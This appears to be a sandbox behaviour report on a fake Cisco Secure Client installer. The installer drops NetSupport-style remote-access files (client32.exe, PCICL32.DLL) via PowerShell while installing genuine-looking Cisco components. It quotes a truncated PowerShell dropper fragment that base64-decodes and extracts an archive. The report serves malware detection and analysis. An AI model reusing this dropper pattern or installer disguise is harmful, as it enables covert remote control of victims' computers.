                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: edgegdi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: edgegdi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
                                  Source: Cisco Secure Client for Windows.lnk.6.drLNK file: ..\..\..\..\..\..\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\Cisco\nsm_vpro.iniJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpWindow found: window name: TSelectLanguageFormJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpAutomated click: OK
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpAutomated click: Install
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to behavior
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 0000000B.00000002.70085959450.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000C.00000002.69251363793.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000D.00000002.69332147319.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69181004956.000000000A0AB000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\kdf\api\layer4\winxp\Win32\Release\ac_sock_fltr_api.pdb% source: is-8FFCG.tmp.6.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69174549429.0000000007B12000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Agent\Win32\Release\vpnagent.pdb source: is-J44M9.tmp.6.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Agent\Win32\Release\vpnagent.pdbaa\GCTL source: is-J44M9.tmp.6.dr
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdb source: is-C05BP.tmp.6.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Downloader\Win32\Release\vpndownloader.pdb source: is-4ES8I.tmp.6.dr
                                  Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000C.00000002.69251018247.0000000068BF1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000D.00000002.69331721534.0000000068BF1000.00000020.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69180702830.0000000009FC0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdcrypto\buildinf.pdb /MT /Zl /Gs0 /GF /Gy /W3 /Zf /wd4090 /nologo /O2 /guard:cf -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM -DOPENSSL_USE_BUILD_DATE -DOPENSSL_NO_HEARTBEATS -D_CRT_SECURE_NO_WARNINGS -DNDEBUG /I C:/Users/build/p4files/ngc/Quicksilver/published/openssl/include source: is-4ES8I.tmp.6.dr
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\kdf\api\layer4\winxp\Win32\Release\ac_sock_fltr_api.pdb source: is-8FFCG.tmp.6.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdbAAA source: is-C05BP.tmp.6.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 0000000B.00000002.70086113734.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000C.00000002.69251545748.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000D.00000002.69332386538.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp
                                  Source: Binary string: crypto\pem\pem_pkey.cRSA PRIVATE KEYDSA PRIVATE KEYEC PRIVATE KEYcompiler: cl /Zi /Fdcrypto\buildinf.pdb /MT /Zl /Gs0 /GF /Gy /W3 /Zf /wd4090 /nologo /O2 /guard:cf -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM -DOPENSSL_USE_BUILD_DATE -DOPENSSL_NO_HEARTBEATS -D_CRT_SECURE_NO_WARNINGS -DNDEBUG /I C:/Users/build/p4files/ngc/Quicksilver/published/openssl/includecrypto\asn1\x_info.ccrypto\pem\pem_info.ccrypto\ocsp\ocsp_lib.c source: is-4ES8I.tmp.6.dr

                                  Data Obfuscation

                                  barindex
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Content);[System.IO.File]::WriteAllBytes($zipFileName, $decodedBytes);New-Item -ItemType Directory -Path $destinationPath;Expand-Archive -Path $zipFileName -DestinationPath $de
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,11_2_11029230
                                  Source: CiscoSetup.exe.2.drStatic PE information: section name: .didata
                                  Source: CiscoSetup.tmp.5.drStatic PE information: section name: .didata
                                  Source: is-HMVS5.tmp.6.drStatic PE information: section name: .didata
                                  Source: is-UHIQE.tmp.6.drStatic PE information: section name: fipstx
                                  Source: is-UHIQE.tmp.6.drStatic PE information: section name: fipsro
                                  Source: is-UHIQE.tmp.6.drStatic PE information: section name: fipsda
                                  Source: is-UHIQE.tmp.6.drStatic PE information: section name: fsig
                                  Source: is-UHIQE.tmp.6.drStatic PE information: section name: fipsrd
                                  Source: is-KBBQU.tmp.6.drStatic PE information: section name: _RDATA
                                  Source: is-AC64O.tmp.6.drStatic PE information: section name: _RDATA
                                  Source: is-GT7EB.tmp.6.drStatic PE information: section name: .orpc
                                  Source: is-DLGKK.tmp.6.drStatic PE information: section name: .00cfg
                                  Source: is-DLGKK.tmp.6.drStatic PE information: section name: .voltbl
                                  Source: PCICL32.DLL.8.drStatic PE information: section name: .hhshare
                                  Source: C:\Windows\SysWOW64\wget.exeCode function: 2_3_02DEB6F0 pushfd ; retn 0000h2_3_02DEB71B
                                  Source: C:\Windows\SysWOW64\wget.exeCode function: 2_3_02DF38E0 pushad ; ret 2_3_02DF38E3
                                  Source: C:\Windows\SysWOW64\wget.exeCode function: 2_3_02DEB511 pushad ; retn 0078h2_3_02DEB6ED
                                  Source: C:\Windows\SysWOW64\wget.exeCode function: 2_3_02DEB6F0 pushfd ; retn 0000h2_3_02DEB71B
                                  Source: C:\Windows\SysWOW64\wget.exeCode function: 2_3_02DF38E0 pushad ; ret 2_3_02DF38E3
                                  Source: C:\Windows\SysWOW64\wget.exeCode function: 2_3_02DEB511 pushad ; retn 0078h2_3_02DEB6ED
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04F436E7 push ebx; iretd 8_2_04F436EA
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1116B825 push ecx; ret 11_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11166719 push ecx; ret 11_2_1116672C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689E6BBF push ecx; ret 11_2_689E6BD2
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1116B825 push ecx; ret 12_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11166719 push ecx; ret 12_2_1116672C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C00995 push ecx; ret 12_2_68C009A8
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C0C904 push edx; retf 0068h12_2_68C0C90E
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68BF2D80 push eax; ret 12_2_68BF2D9E
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C1A6AA push EF3FEFD4h; iretd 12_2_68C1A6B1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C0C7D0 push ebx; retf 0068h12_2_68C0C7D2
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C19CD8 pushad ; iretd 12_2_68C19CE6
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C0BF60 push ecx; ret 12_2_68C0BF73
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C050BB push EF706683h; ret 12_2_68C050C0
                                  Source: is-BKRIV.tmp.6.drStatic PE information: section name: .text entropy: 6.8383653762559575
                                  Source: msvcr100.dll.8.drStatic PE information: section name: .text entropy: 6.909044922675825
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\ProxyCon.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KBBQU.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3VLKE.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-RH114.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\acdownloader.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnipsec.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1MCPC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E5LH8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_2.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\csc_ui_setup.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-BKRIV.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q3KOA.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui_toast.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-R0O6I.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3E159.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapishim.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.sys (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-IQ59L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-AC64O.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_system.dll (copy)Jump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\client32.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnmgmttun.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-IGGJL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KEI9E.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MTMR6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-4ES8I.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\cfom.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\zlib1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-8PPEF.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper64.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-KVJK8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\is-HMVS5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\ac_sock_fltr_api.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_thread.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-QS498.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-C05BP.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\wget.exeFile created: C:\Users\user\Desktop\download\CiscoSetup.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KNT8U.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscocrypto.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OFTU2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-SHB4H.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-T5R7J.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acextwebhelper.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1IOCC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-FBE8U.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagentutilities.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-GT7EB.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-QHSOL.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-FVJ6D.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\VACon64.exe (copy)Jump to dropped file
